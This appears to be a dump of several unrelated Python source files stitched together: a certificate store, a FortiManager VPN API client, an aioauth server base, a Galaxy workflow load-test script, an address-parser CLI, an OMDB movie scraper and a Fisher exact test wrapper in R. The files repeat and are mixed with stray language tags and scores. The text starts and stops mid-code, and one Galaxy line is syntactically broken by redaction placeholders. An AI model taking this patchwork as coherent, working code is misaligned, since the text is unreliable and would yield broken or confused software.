<SHA-256>.pem. cert_file_name = hexlify(certificate.fingerprint(SHA256())).decode('ascii') cert_path = self._path / f'{cert_file_name}.pem' # If the cert is NOT already there, add it if not cert_path.exists(): with open(cert_path, 'w') as cert_file: cert_file.write(certificate.public_bytes(Encoding.PEM).decode('ascii')) return cert_path
from binascii import hexlify from pathlib import Path import os from typing import Union, List from cryptography.hazmat.backends import default_backend from cryptography.hazmat.primitives import hashes from cryptography.hazmat.primitives.hashes import SHA256 from cryptography.hazmat.primitives.serialization import Encoding from cryptography.x509 import Certificate, load_pem_x509_certificate class CertificateNotFoundError(KeyError): pass class RootCertificatesRepository: """A local folder where we store as many root certificates (as PEM files) as possible. """ def __init__(self, local_root_path: Path) -> None: self._path = local_root_path all_certificates = [] for pem_file_path in self._path.glob('*.pem'): with open(pem_file_path) as pem_file: cert_pem = pem_file.read() cert = load_pem_x509_certificate(cert_pem.encode(encoding='ascii'), default_backend()) all_certificates.append(cert) self._all_certificates = all_certificates # Parse each certificate so we can look them up with SHA1 self._sha1_map = {cert.fingerprint(hashes.SHA1()): cert for cert in self._all_certificates} @classmethod def get_default(cls) -> 'RootCertificatesRepository': root_path = Path(os.path.abspath(os.path.dirname(__file__))) / '..' / 'certificates' return cls(root_path) def get_all_certificates(self) -> List[Certificate]: return self._all_certificates def lookup_certificate_with_fingerprint( self, fingerprint: bytes, hash_algorithm: Union[hashes.SHA1, hashes.SHA256] = hashes.SHA256(), ) -> Certificate: hex_fingerprint = hexlify(fingerprint).decode('ascii') if isinstance(hash_algorithm, hashes.SHA1): try: return self._sha1_map[fingerprint] except KeyError: raise CertificateNotFoundError(f'Could not find certificate {hex_fingerprint}') elif isinstance(hash_algorithm, hashes.SHA256): try: return self._lookup_certificate_with_sha256_fingerprint(fingerprint) except FileNotFoundError: raise CertificateNotFoundError(f'Could not find certificate {hex_fingerprint}') else: raise ValueError('Hash algorithm not supported') def _lookup_certificate_with_sha256_fingerprint(self, fingerprint: bytes) -> Certificate: hex_fingerprint = hexlify(fingerprint).decode('ascii') pem_path = self._path / f'{hex_fingerprint}.pem' with open(pem_path, mode='r') as pem_file: cert_pem = pem_file.read() # Parse the certificate to double check the fingerprint parsed_cert = load_pem_x509_certificate(cert_pem.encode(encoding='ascii'), default_backend()) if fingerprint != parsed_cert.fingerprint(SHA256()): cert_fingerprint = hexlify(parsed_cert.fingerprint(SHA256()).decode('ascii')) hex_fingerprint = hexlify(fingerprint).decode('ascii') raise ValueError(f'Fingerprint mismatch for certificate :{hex_fingerprint} VS {cert_fingerprint}') return parsed_cert def store_certificate(self, certificate: Certificate) -> Path: """Store the supplied certificate as a PEM file. """ # A given certificate's path is always <SHA-256>.pem. cert_file_name = hexlify(certificate.fingerprint(SHA256())).decode('ascii') cert_path = self._path / f'{cert_file_name}.pem' # If the cert is NOT already there, add it if not cert_path.exists(): with open(cert_path, 'w') as cert_file: cert_file.write(certificate.public_bytes(Encoding.PEM).decode('ascii')) return cert_path
en
0.899665
A local folder where we store as many root certificates (as PEM files) as possible. # Parse each certificate so we can look them up with SHA1 # Parse the certificate to double check the fingerprint Store the supplied certificate as a PEM file. # A given certificate's path is always <SHA-256>.pem. # If the cert is NOT already there, add it
2.580744
3
LargeScaleDeployment/fortimanager/fmg_api/vpn_manager.py
dmitryperets/testbeds
11
6627859
#!/usr/bin/env python3 from fmg_api.api_base import ApiSession class VpnManagerApi(ApiSession): ############################################################## # Add Overlay ############################################################## def addOverlay(self, overlay_name, hub_name, spoke_group, wan_intf, network_id): self.addVpnCommunity(overlay_name, network_id) self.addVpnHub(overlay_name, hub_name, wan_intf) self.addVpnSpokeGroup(overlay_name, spoke_group, wan_intf) ############################################################## # Update Overlay ############################################################## def updateOverlay(self, overlay_name, network_id): self.addVpnCommunity(overlay_name, network_id, update=True) ############################################################## # Get Overlays ############################################################## def getOverlays(self): overlay_list = {} payload = { "session": self._session, "id": 1, "method": "get", "params": [ { "url": "/pm/config/adom/" + self.adom + "/obj/vpnmgr/node", "option": [ "scope member" ] } ] } content = self._run_request(payload, name="Get VPN Nodes") for node in content["result"][0]["data"]: community = node["vpntable"][0] if community not in overlay_list: overlay_list[community] = [] overlay_list[community].append(node["scope member"][0]["name"]) return overlay_list ############################################################## # Add VPN Community ############################################################## def addVpnCommunity(self, community_name, network_id, update=False): payload = { "session": self._session, "id": 1, "method": "set" if not update else "update", "params": [ { "url": "/pm/config/adom/" + self.adom + "/obj/vpnmgr/vpntable", "data": { "name": community_name, "topology": 2, "psk-auto-generate": 1, "ike1keylifesec": 28800, "ike1dpd": 1, "ike1natkeepalive": 10, "dpd": 3, "dpd-retrycount": 3, "dpd-retryinterval": 10, "ike2keylifesec": 3600, "ike2keylifekbs": 5120, "ike2keepalive": 1, "intf-mode": 0, "fcc-enforcement": 0, "ike-version": 2, "negotiate-timeout": 30, "inter-vdom": 0, "auto-zone-policy": 0, "npu-offload": 1, "authmethod": 1, "ike1dhgroup": 12, "localid-type": 0, "ike1mode": 1, "ike1nattraversal": 1, "ike1proposal": [ "aes256gcm-prfsha256" ], "ike2autonego": 0, "ike2dhgroup": 12, "ike2keylifetype": 1, "pfs": 1, "ike2proposal": [ "aes256gcm" ], "replay": 1, "network-overlay": 1, "network-id": network_id } } ] } self._run_request(payload, name=f"Add VPN Community ({community_name})") ############################################################## # Add VPN Hub ############################################################## def addVpnHub(self, community_name, hub_name, wan_intf): payload = { "session": self._session, "id": 1, "method": "set", "params": [ { "url": "/pm/config/adom/" + self.adom + "/obj/vpnmgr/node", "data": [ { "protected_subnet": { "addr": "all", "seq": 1 }, "scope member": { "name": hub_name, "vdom": "root" }, "vpntable": community_name, "role": 0, "iface": wan_intf, "automatic_routing": 0, "mode-cfg": 0, "net-device": 0, "tunnel-search": 1, "add-route": 0, "peertype": 1, "auto-configuration": 0 } ] } ] } self._run_request(payload, name=f"Add VPN Hub {hub_name} to {community_name}") ############################################################## # Add VPN Spoke Group ############################################################## def addVpnSpokeGroup(self, community_name, spoke_group, wan_intf): payload = { "session": self._session, "id": 1, "method": "set", "params": [ { "url": "/pm/config/adom/" + self.adom + "/obj/vpnmgr/node", "data": [ { "protected_subnet": { "addr": "all", "seq": 1 }, "scope member": { "name": spoke_group }, "vpntable": community_name, "role": 1, "iface": wan_intf, "automatic_routing": 0, "add-route": 0, "mode-cfg": 0, "assign-ip": 0, "net-device": 1, "peertype": 8 } ] } ] } self._run_request(payload, name=f"Add VPN Spoke Group {spoke_group} to {community_name}") ############################################################## # Delete VPN Community ############################################################## def deleteVpnCommunity(self, community_name): payload = { "session": self._session, "id": 1, "method": "delete", "params": [ { "url": "/pm/config/adom/" + self.adom + "/obj/vpnmgr/vpntable/" + community_name } ] } self._run_request(payload, name=f"Delete VPN Community {community_name}")
#!/usr/bin/env python3 from fmg_api.api_base import ApiSession class VpnManagerApi(ApiSession): ############################################################## # Add Overlay ############################################################## def addOverlay(self, overlay_name, hub_name, spoke_group, wan_intf, network_id): self.addVpnCommunity(overlay_name, network_id) self.addVpnHub(overlay_name, hub_name, wan_intf) self.addVpnSpokeGroup(overlay_name, spoke_group, wan_intf) ############################################################## # Update Overlay ############################################################## def updateOverlay(self, overlay_name, network_id): self.addVpnCommunity(overlay_name, network_id, update=True) ############################################################## # Get Overlays ############################################################## def getOverlays(self): overlay_list = {} payload = { "session": self._session, "id": 1, "method": "get", "params": [ { "url": "/pm/config/adom/" + self.adom + "/obj/vpnmgr/node", "option": [ "scope member" ] } ] } content = self._run_request(payload, name="Get VPN Nodes") for node in content["result"][0]["data"]: community = node["vpntable"][0] if community not in overlay_list: overlay_list[community] = [] overlay_list[community].append(node["scope member"][0]["name"]) return overlay_list ############################################################## # Add VPN Community ############################################################## def addVpnCommunity(self, community_name, network_id, update=False): payload = { "session": self._session, "id": 1, "method": "set" if not update else "update", "params": [ { "url": "/pm/config/adom/" + self.adom + "/obj/vpnmgr/vpntable", "data": { "name": community_name, "topology": 2, "psk-auto-generate": 1, "ike1keylifesec": 28800, "ike1dpd": 1, "ike1natkeepalive": 10, "dpd": 3, "dpd-retrycount": 3, "dpd-retryinterval": 10, "ike2keylifesec": 3600, "ike2keylifekbs": 5120, "ike2keepalive": 1, "intf-mode": 0, "fcc-enforcement": 0, "ike-version": 2, "negotiate-timeout": 30, "inter-vdom": 0, "auto-zone-policy": 0, "npu-offload": 1, "authmethod": 1, "ike1dhgroup": 12, "localid-type": 0, "ike1mode": 1, "ike1nattraversal": 1, "ike1proposal": [ "aes256gcm-prfsha256" ], "ike2autonego": 0, "ike2dhgroup": 12, "ike2keylifetype": 1, "pfs": 1, "ike2proposal": [ "aes256gcm" ], "replay": 1, "network-overlay": 1, "network-id": network_id } } ] } self._run_request(payload, name=f"Add VPN Community ({community_name})") ############################################################## # Add VPN Hub ############################################################## def addVpnHub(self, community_name, hub_name, wan_intf): payload = { "session": self._session, "id": 1, "method": "set", "params": [ { "url": "/pm/config/adom/" + self.adom + "/obj/vpnmgr/node", "data": [ { "protected_subnet": { "addr": "all", "seq": 1 }, "scope member": { "name": hub_name, "vdom": "root" }, "vpntable": community_name, "role": 0, "iface": wan_intf, "automatic_routing": 0, "mode-cfg": 0, "net-device": 0, "tunnel-search": 1, "add-route": 0, "peertype": 1, "auto-configuration": 0 } ] } ] } self._run_request(payload, name=f"Add VPN Hub {hub_name} to {community_name}") ############################################################## # Add VPN Spoke Group ############################################################## def addVpnSpokeGroup(self, community_name, spoke_group, wan_intf): payload = { "session": self._session, "id": 1, "method": "set", "params": [ { "url": "/pm/config/adom/" + self.adom + "/obj/vpnmgr/node", "data": [ { "protected_subnet": { "addr": "all", "seq": 1 }, "scope member": { "name": spoke_group }, "vpntable": community_name, "role": 1, "iface": wan_intf, "automatic_routing": 0, "add-route": 0, "mode-cfg": 0, "assign-ip": 0, "net-device": 1, "peertype": 8 } ] } ] } self._run_request(payload, name=f"Add VPN Spoke Group {spoke_group} to {community_name}") ############################################################## # Delete VPN Community ############################################################## def deleteVpnCommunity(self, community_name): payload = { "session": self._session, "id": 1, "method": "delete", "params": [ { "url": "/pm/config/adom/" + self.adom + "/obj/vpnmgr/vpntable/" + community_name } ] } self._run_request(payload, name=f"Delete VPN Community {community_name}")
de
0.821471
#!/usr/bin/env python3 ############################################################## # Add Overlay ############################################################## ############################################################## # Update Overlay ############################################################## ############################################################## # Get Overlays ############################################################## ############################################################## # Add VPN Community ############################################################## ############################################################## # Add VPN Hub ############################################################## ############################################################## # Add VPN Spoke Group ############################################################## ############################################################## # Delete VPN Community ##############################################################
1.892488
2
src/aioauth/base/server.py
danygielow/aioauth
0
6627860
<filename>src/aioauth/base/server.py from typing import Dict, Optional, Type, Union from ..grant_type import ( AuthorizationCodeGrantType, ClientCredentialsGrantType, GrantTypeBase, PasswordGrantType, RefreshTokenGrantType, ) from ..response_type import ( ResponseTypeAuthorizationCode, ResponseTypeBase, ResponseTypeToken, ) from ..types import EndpointType, GrantType, ResponseType from .database import BaseDB class BaseAuthorizationServer: response_type: Dict[Optional[ResponseType], Type[ResponseTypeBase]] = { ResponseType.TYPE_TOKEN: ResponseTypeToken, ResponseType.TYPE_CODE: ResponseTypeAuthorizationCode, } grant_type: Dict[Optional[GrantType], Type[GrantTypeBase]] = { GrantType.TYPE_AUTHORIZATION_CODE: AuthorizationCodeGrantType, GrantType.TYPE_CLIENT_CREDENTIALS: ClientCredentialsGrantType, GrantType.TYPE_PASSWORD: PasswordGrantType, GrantType.TYPE_REFRESH_TOKEN: RefreshTokenGrantType, } def __init__(self, db: BaseDB): self.db = db def register( self, endpoint_type: EndpointType, server: Union[ResponseType, GrantType], endpoint_cls: Union[Type[ResponseTypeBase], Type[GrantTypeBase]], ): endpoint_dict = getattr(self, endpoint_type) endpoint_dict[server] = endpoint_cls def unregister( self, endpoint_type: EndpointType, server: Union[ResponseType, GrantType] ): endpoint_dict = getattr(self, endpoint_type) del endpoint_dict[server]
<filename>src/aioauth/base/server.py from typing import Dict, Optional, Type, Union from ..grant_type import ( AuthorizationCodeGrantType, ClientCredentialsGrantType, GrantTypeBase, PasswordGrantType, RefreshTokenGrantType, ) from ..response_type import ( ResponseTypeAuthorizationCode, ResponseTypeBase, ResponseTypeToken, ) from ..types import EndpointType, GrantType, ResponseType from .database import BaseDB class BaseAuthorizationServer: response_type: Dict[Optional[ResponseType], Type[ResponseTypeBase]] = { ResponseType.TYPE_TOKEN: ResponseTypeToken, ResponseType.TYPE_CODE: ResponseTypeAuthorizationCode, } grant_type: Dict[Optional[GrantType], Type[GrantTypeBase]] = { GrantType.TYPE_AUTHORIZATION_CODE: AuthorizationCodeGrantType, GrantType.TYPE_CLIENT_CREDENTIALS: ClientCredentialsGrantType, GrantType.TYPE_PASSWORD: PasswordGrantType, GrantType.TYPE_REFRESH_TOKEN: RefreshTokenGrantType, } def __init__(self, db: BaseDB): self.db = db def register( self, endpoint_type: EndpointType, server: Union[ResponseType, GrantType], endpoint_cls: Union[Type[ResponseTypeBase], Type[GrantTypeBase]], ): endpoint_dict = getattr(self, endpoint_type) endpoint_dict[server] = endpoint_cls def unregister( self, endpoint_type: EndpointType, server: Union[ResponseType, GrantType] ): endpoint_dict = getattr(self, endpoint_type) del endpoint_dict[server]
none
1
1.992781
2
test/manual/workflows_scaling.py
BalthazarPavot/galaxy_project_reports
1
6627861
import functools import json import os import random import sys from threading import Thread from uuid import uuid4 galaxy_root = os.path.abspath(os.path.join(os.path.dirname(__file__), os.path.pardir, os.path.pardir)) sys.path[1:1] = [ os.path.join( galaxy_root, "lib" ), os.path.join( galaxy_root, "test" ) ] try: from argparse import ArgumentParser except ImportError: ArgumentParser = None import requests from bioblend import galaxy from api import helpers, yaml_to_workflow LONG_TIMEOUT = 1000000000 DESCRIPTION = "Script to exercise the workflow engine." def main(argv=None): if ArgumentParser is None: raise Exception("Test requires Python 2.7") arg_parser = ArgumentParser(description=DESCRIPTION) arg_parser.add_argument("--api_key", default="testmasterapikey") arg_parser.add_argument("--host", default="http://localhost:8080/") arg_parser.add_argument("--collection_size", type=int, default=20) arg_parser.add_argument("--workflow_depth", type=int, default=10) arg_parser.add_argument("--two_outputs", default=False, action="store_true") arg_parser.add_argument("--workflow_count", type=int, default=1) args = arg_parser.parse_args(argv) uuid = str(uuid4()) workflow_struct = _workflow_struct(args, uuid) gi = _gi(args) workflow = yaml_to_workflow.python_to_workflow(workflow_struct) workflow_info = gi.workflows.import_workflow_json(workflow) workflow_id = workflow_info["id"] target = functools.partial(_run, args, gi, workflow_id, uuid) threads = [] for i in range(args.workflow_count): t = Thread(target=target) t.daemon = True t.start() threads.append(t) for t in threads: t.join() def _run(args, gi, workflow_id, uuid): dataset_populator = GiDatasetPopulator(gi) dataset_collection_populator = GiDatasetCollectionPopulator(gi) history_id = dataset_populator.new_history() contents = [] for i in range(args.collection_size): contents.append("random dataset number #%d" % i) hdca = dataset_collection_populator.create_list_in_history( history_id, contents=contents ).json() label_map = { uuid: {"src": "hdca", "id": hdca["id"]}, } workflow_request = dict( history="hist_id=%s" % history_id, ) workflow_request[ "inputs" ] = json.dumps( label_map ) url = "workflows/%s/usage" % ( workflow_id ) invoke_response = dataset_populator._post( url, data=workflow_request ).json() invocation_id = invoke_response["id"] workflow_populator = GiWorkflowPopulator(gi) workflow_populator.wait_for_workflow( workflow_id, invocation_id, history_id, timeout=LONG_TIMEOUT ) class GiPostGetMixin: def _get(self, route): return self._gi.make_get_request(self.__url(route)) def _post(self, route, data={}): data = data.copy() data['key'] = self._gi.key return requests.post(self.__url(route), data=data) def __url(self, route): return self._gi.url + "/" + route class GiDatasetPopulator(helpers.BaseDatasetPopulator, GiPostGetMixin): def __init__(self, gi): self._gi = gi class GiDatasetCollectionPopulator(helpers.BaseDatasetCollectionPopulator, GiPostGetMixin): def __init__(self, gi): self._gi = gi self.dataset_populator = GiDatasetPopulator(gi) def _create_collection(self, payload): create_response = self._post( "dataset_collections", data=payload ) return create_response class GiWorkflowPopulator(helpers.BaseWorkflowPopulator, GiPostGetMixin): def __init__(self, gi): self._gi = gi self.dataset_populator = GiDatasetPopulator(gi) def _workflow_struct(args, input_uuid): if args.two_outputs: return _workflow_struct_two_outputs(args, input_uuid) else: return _workflow_struct_simple(args, input_uuid) def _workflow_struct_simple(args, input_uuid): workflow_struct = [ {"type": "input_collection", "uuid": input_uuid}, {"tool_id": "cat1", "state": {"input1": _link(0)}} ] workflow_depth = args.workflow_depth for i in range(workflow_depth): link = str(i + 1) + "#out_file1" workflow_struct.append( {"tool_id": "cat1", "state": {"input1": _link(link)}} ) return workflow_struct def _workflow_struct_two_outputs(args, input_uuid): workflow_struct = [ {"type": "input_collection", "uuid": input_uuid}, {"tool_id": "cat1", "state": {"input1": _link(0), "input2": _link(0)}} ] workflow_depth = args.workflow_depth for i in range(workflow_depth): link1 = str(i + 1) + "#out_file1" link2 = str(i + 1) + "#out_file2" workflow_struct.append( {"tool_id": "cat1", "state": {"input1": _link(link1), "input2": _link(link2)}} ) return workflow_struct def _link(link): return {"$link": link} def _gi(args): gi = galaxy.GalaxyInstance(args.host, key=args.api_key) name = "wftest-user-%d" % random.randint(0, 1000000) user = gi.users.create_local_user(name, <EMAIL>" % name, "<PASSWORD>") user_id = user["id"] api_key = gi.users.create_user_apikey(user_id) user_gi = galaxy.GalaxyInstance(args.host, api_key) return user_gi if __name__ == "__main__": main()
import functools import json import os import random import sys from threading import Thread from uuid import uuid4 galaxy_root = os.path.abspath(os.path.join(os.path.dirname(__file__), os.path.pardir, os.path.pardir)) sys.path[1:1] = [ os.path.join( galaxy_root, "lib" ), os.path.join( galaxy_root, "test" ) ] try: from argparse import ArgumentParser except ImportError: ArgumentParser = None import requests from bioblend import galaxy from api import helpers, yaml_to_workflow LONG_TIMEOUT = 1000000000 DESCRIPTION = "Script to exercise the workflow engine." def main(argv=None): if ArgumentParser is None: raise Exception("Test requires Python 2.7") arg_parser = ArgumentParser(description=DESCRIPTION) arg_parser.add_argument("--api_key", default="testmasterapikey") arg_parser.add_argument("--host", default="http://localhost:8080/") arg_parser.add_argument("--collection_size", type=int, default=20) arg_parser.add_argument("--workflow_depth", type=int, default=10) arg_parser.add_argument("--two_outputs", default=False, action="store_true") arg_parser.add_argument("--workflow_count", type=int, default=1) args = arg_parser.parse_args(argv) uuid = str(uuid4()) workflow_struct = _workflow_struct(args, uuid) gi = _gi(args) workflow = yaml_to_workflow.python_to_workflow(workflow_struct) workflow_info = gi.workflows.import_workflow_json(workflow) workflow_id = workflow_info["id"] target = functools.partial(_run, args, gi, workflow_id, uuid) threads = [] for i in range(args.workflow_count): t = Thread(target=target) t.daemon = True t.start() threads.append(t) for t in threads: t.join() def _run(args, gi, workflow_id, uuid): dataset_populator = GiDatasetPopulator(gi) dataset_collection_populator = GiDatasetCollectionPopulator(gi) history_id = dataset_populator.new_history() contents = [] for i in range(args.collection_size): contents.append("random dataset number #%d" % i) hdca = dataset_collection_populator.create_list_in_history( history_id, contents=contents ).json() label_map = { uuid: {"src": "hdca", "id": hdca["id"]}, } workflow_request = dict( history="hist_id=%s" % history_id, ) workflow_request[ "inputs" ] = json.dumps( label_map ) url = "workflows/%s/usage" % ( workflow_id ) invoke_response = dataset_populator._post( url, data=workflow_request ).json() invocation_id = invoke_response["id"] workflow_populator = GiWorkflowPopulator(gi) workflow_populator.wait_for_workflow( workflow_id, invocation_id, history_id, timeout=LONG_TIMEOUT ) class GiPostGetMixin: def _get(self, route): return self._gi.make_get_request(self.__url(route)) def _post(self, route, data={}): data = data.copy() data['key'] = self._gi.key return requests.post(self.__url(route), data=data) def __url(self, route): return self._gi.url + "/" + route class GiDatasetPopulator(helpers.BaseDatasetPopulator, GiPostGetMixin): def __init__(self, gi): self._gi = gi class GiDatasetCollectionPopulator(helpers.BaseDatasetCollectionPopulator, GiPostGetMixin): def __init__(self, gi): self._gi = gi self.dataset_populator = GiDatasetPopulator(gi) def _create_collection(self, payload): create_response = self._post( "dataset_collections", data=payload ) return create_response class GiWorkflowPopulator(helpers.BaseWorkflowPopulator, GiPostGetMixin): def __init__(self, gi): self._gi = gi self.dataset_populator = GiDatasetPopulator(gi) def _workflow_struct(args, input_uuid): if args.two_outputs: return _workflow_struct_two_outputs(args, input_uuid) else: return _workflow_struct_simple(args, input_uuid) def _workflow_struct_simple(args, input_uuid): workflow_struct = [ {"type": "input_collection", "uuid": input_uuid}, {"tool_id": "cat1", "state": {"input1": _link(0)}} ] workflow_depth = args.workflow_depth for i in range(workflow_depth): link = str(i + 1) + "#out_file1" workflow_struct.append( {"tool_id": "cat1", "state": {"input1": _link(link)}} ) return workflow_struct def _workflow_struct_two_outputs(args, input_uuid): workflow_struct = [ {"type": "input_collection", "uuid": input_uuid}, {"tool_id": "cat1", "state": {"input1": _link(0), "input2": _link(0)}} ] workflow_depth = args.workflow_depth for i in range(workflow_depth): link1 = str(i + 1) + "#out_file1" link2 = str(i + 1) + "#out_file2" workflow_struct.append( {"tool_id": "cat1", "state": {"input1": _link(link1), "input2": _link(link2)}} ) return workflow_struct def _link(link): return {"$link": link} def _gi(args): gi = galaxy.GalaxyInstance(args.host, key=args.api_key) name = "wftest-user-%d" % random.randint(0, 1000000) user = gi.users.create_local_user(name, <EMAIL>" % name, "<PASSWORD>") user_id = user["id"] api_key = gi.users.create_user_apikey(user_id) user_gi = galaxy.GalaxyInstance(args.host, api_key) return user_gi if __name__ == "__main__": main()
none
1
2.368937
2
starter_console.py
a-doom/address-converter
0
6627862
<filename>starter_console.py from address_converter.converter import Converter import argparse import sys def main(): parser = argparse.ArgumentParser( formatter_class=argparse.RawDescriptionHelpFormatter, description='''\ Address string parser Returns a list of separated values into output file: [<input text>];[<resulting formatted address>];<ID address objects>...''') parser.add_argument('infile', nargs='?', type=argparse.FileType('r'), default=sys.stdin) parser.add_argument('outfile', nargs='?', type=argparse.FileType('w'), default=sys.stdout) parser.add_argument('--showinput', '--si', default=0, choices=[0, 1], type=int, help='return <input text>', dest='show_input') parser.add_argument('--showaddress', '--sa', default=0, choices=[0, 1], help='return <resulting formatted address>', type=int, dest='show_address') parser.add_argument('--checkgramm', '--gr', default=0, choices=[0, 1], help='check grammar', type=int, dest='check_grammar') parser.add_argument('--errorlog', '--el', default=0, choices=[0, 1], help='write the error log', type=int, dest='write_error_log') args = parser.parse_args() with Converter(write_error_log=args.write_error_log) as converter: for input_str in args.infile: address_list = converter.convert( address=input_str, is_check_grammar=args.check_grammar) for address in address_list: result = [] if args.show_input: result.append(input_str[:-1]) if args.show_address: result.append(address.calc_address_string()) result.extend([addrobj.aoguid for addrobj in address.addr_path]) args.outfile.write(';'.join(result) + '\n') args.outfile.flush() if __name__ == "__main__": main()
<filename>starter_console.py from address_converter.converter import Converter import argparse import sys def main(): parser = argparse.ArgumentParser( formatter_class=argparse.RawDescriptionHelpFormatter, description='''\ Address string parser Returns a list of separated values into output file: [<input text>];[<resulting formatted address>];<ID address objects>...''') parser.add_argument('infile', nargs='?', type=argparse.FileType('r'), default=sys.stdin) parser.add_argument('outfile', nargs='?', type=argparse.FileType('w'), default=sys.stdout) parser.add_argument('--showinput', '--si', default=0, choices=[0, 1], type=int, help='return <input text>', dest='show_input') parser.add_argument('--showaddress', '--sa', default=0, choices=[0, 1], help='return <resulting formatted address>', type=int, dest='show_address') parser.add_argument('--checkgramm', '--gr', default=0, choices=[0, 1], help='check grammar', type=int, dest='check_grammar') parser.add_argument('--errorlog', '--el', default=0, choices=[0, 1], help='write the error log', type=int, dest='write_error_log') args = parser.parse_args() with Converter(write_error_log=args.write_error_log) as converter: for input_str in args.infile: address_list = converter.convert( address=input_str, is_check_grammar=args.check_grammar) for address in address_list: result = [] if args.show_input: result.append(input_str[:-1]) if args.show_address: result.append(address.calc_address_string()) result.extend([addrobj.aoguid for addrobj in address.addr_path]) args.outfile.write(';'.join(result) + '\n') args.outfile.flush() if __name__ == "__main__": main()
en
0.454603
\ Address string parser Returns a list of separated values into output file: [<input text>];[<resulting formatted address>];<ID address objects>...
3.425565
3
data_gather/get_movie_metadata.py
bkimmig/data-mining-project
1
6627863
import numpy as np import pandas as pd import json import requests # ------------------------------------------------------------------ # # Gather the data from the movie_metadata.csv file. This was # downloaded from Kaggle # https://www.kaggle.com/deepmatrix/imdb-5000-movie-dataset # We will use this movie list to gather synopses and genres for each # movie, from the OMDB API, in this data set. # ------------------------------------------------------------------ # OMDB_API_URL = "http://www.omdbapi.com/?i={}&plot=full&r=json" movie_data = pd.read_csv('../data/movie_metadata.csv') synopses = [] for i in range(len(movie_data)): movie = movie_data['movie_title'][i].rstrip() ## use the IMDB ID to search imdb_id = movie_data['movie_imdb_link'][i].split('/')[4] r = requests.get(OMDB_API_URL.format(imdb_id)) try: mdata = r.json() except: continue d = { 'plot': mdata['Plot'], 'title': mdata['Title'], 'genres': mdata['Genre'] } synopses.append(d) if i%500 == 0: print(i) data = { 'data': synopses, 'length': len(synopses) } with open('../data/movie_metadata.json', 'w') as fp: json.dump(data, fp)
import numpy as np import pandas as pd import json import requests # ------------------------------------------------------------------ # # Gather the data from the movie_metadata.csv file. This was # downloaded from Kaggle # https://www.kaggle.com/deepmatrix/imdb-5000-movie-dataset # We will use this movie list to gather synopses and genres for each # movie, from the OMDB API, in this data set. # ------------------------------------------------------------------ # OMDB_API_URL = "http://www.omdbapi.com/?i={}&plot=full&r=json" movie_data = pd.read_csv('../data/movie_metadata.csv') synopses = [] for i in range(len(movie_data)): movie = movie_data['movie_title'][i].rstrip() ## use the IMDB ID to search imdb_id = movie_data['movie_imdb_link'][i].split('/')[4] r = requests.get(OMDB_API_URL.format(imdb_id)) try: mdata = r.json() except: continue d = { 'plot': mdata['Plot'], 'title': mdata['Title'], 'genres': mdata['Genre'] } synopses.append(d) if i%500 == 0: print(i) data = { 'data': synopses, 'length': len(synopses) } with open('../data/movie_metadata.json', 'w') as fp: json.dump(data, fp)
en
0.621424
# ------------------------------------------------------------------ # # Gather the data from the movie_metadata.csv file. This was # downloaded from Kaggle # https://www.kaggle.com/deepmatrix/imdb-5000-movie-dataset # We will use this movie list to gather synopses and genres for each # movie, from the OMDB API, in this data set. # ------------------------------------------------------------------ # ## use the IMDB ID to search
3.222292
3
gene/analysis/fisher_exact.py
tbj128/gene-expression-analyzer
0
6627864
<reponame>tbj128/gene-expression-analyzer<gh_stars>0 # =========================================== # # mian Analysis Data Mining/ML Library # @author: tbj128 # # =========================================== # # Imports # # # ======== R specific setup ========= # import rpy2.robjects as robjects import rpy2.rlike.container as rlc from rpy2.robjects.packages import SignatureTranslatedAnonymousPackage import rpy2.robjects.numpy2ri rpy2.robjects.numpy2ri.activate() from gene.model.otu_table import OTUTable class FisherExact(object): r = robjects.r rcode = """ fisher_exact <- function(base, groups, cat2, cat1, minthreshold) { if (ncol(base) <= 0) { return(matrix(,0,7)) } cat1OTUs = base[groups == cat1,, drop=FALSE]; cat2OTUs = base[groups == cat2,, drop=FALSE]; results = matrix(,ncol(cat1OTUs),7) results = data.frame(results) colnames(results) = c("P-Value", "Q-Value", "Cat1 Present", "Cat1 Total", "Cat2 Present", "Cat2 Total") rownames(results) = colnames(cat1OTUs) for (i in 1:ncol(cat1OTUs)) { fisherMatrix = matrix(,2,2); fisherMatrix[1, 1] = sum(cat2OTUs[,i] > minthreshold); fisherMatrix[1, 2] = sum(cat2OTUs[,i] <= minthreshold); fisherMatrix[2, 1] = sum(cat1OTUs[,i] > minthreshold); fisherMatrix[2, 2] = sum(cat1OTUs[,i] <= minthreshold); totalSumCat1 = fisherMatrix[2, 1] + fisherMatrix[2, 2] totalSumCat2 = fisherMatrix[1, 1] + fisherMatrix[1, 2] ftest = fisher.test(fisherMatrix); results[i,1] = colnames(cat1OTUs)[i] results[i,2] = ftest$p.value results[i,3] = 1 results[i,4] = fisherMatrix[1, 1] results[i,5] = totalSumCat2 - fisherMatrix[1, 1] results[i,6] = fisherMatrix[2, 1] results[i,7] = totalSumCat1 - fisherMatrix[2, 1] } results[,3] = p.adjust(results[,2], method = "fdr"); # Sorts the table according to the (p-val) column results = results[order(results[,2]),] return(results) } """ rStats = SignatureTranslatedAnonymousPackage(rcode, "rStats") def run(self, user_request): table = OTUTable(user_request.user_id, user_request.pid) otu_table, headers, sample_labels = table.get_table_after_filtering_and_aggregation(user_request) metadata_vals = table.get_sample_metadata().get_metadata_column_table_order(sample_labels, user_request.catvar) taxonomy_map = table.get_otu_metadata().get_taxonomy_map() return self.analyse(user_request, otu_table, headers, metadata_vals, taxonomy_map) def analyse(self, user_request, otuTable, headers, metaVals, taxonomy_map): otu_to_genus = {} if int(user_request.level) == -1: # We want to display a short hint for the OTU using the genus (column 5) for header in headers: if header in taxonomy_map and len(taxonomy_map[header]) > 5: otu_to_genus[header] = taxonomy_map[header][5] else: otu_to_genus[header] = "" groups = robjects.FactorVector(robjects.StrVector(metaVals)) # Forms an OTU only table (without IDs) allOTUs = [] col = 0 while col < len(otuTable[0]): allOTUs.append((headers[col], otuTable[:, col])) col += 1 od = rlc.OrdDict(allOTUs) dataf = robjects.DataFrame(od) catVar1 = user_request.get_custom_attr("pwVar1") catVar2 = user_request.get_custom_attr("pwVar2") minthreshold = user_request.get_custom_attr("minthreshold") fisherResults = self.rStats.fisher_exact(dataf, groups, catVar1, catVar2, int(minthreshold)) hints = {} results = [] i = 1 while i <= fisherResults.nrow: newRow = [] j = 1 while j <= fisherResults.ncol: if j > 1: newRow.append(round(float(fisherResults.rx(i, j)[0]), 6)) else: newRow.append(str(fisherResults.rx(i, j)[0])) j += 1 otu = newRow[0] if int(user_request.level) == -1: hints[otu] = otu_to_genus[otu] i += 1 results.append(newRow) cat1 = catVar1 cat2 = catVar2 abundancesObj = {} abundancesObj["results"] = results abundancesObj["hints"] = hints 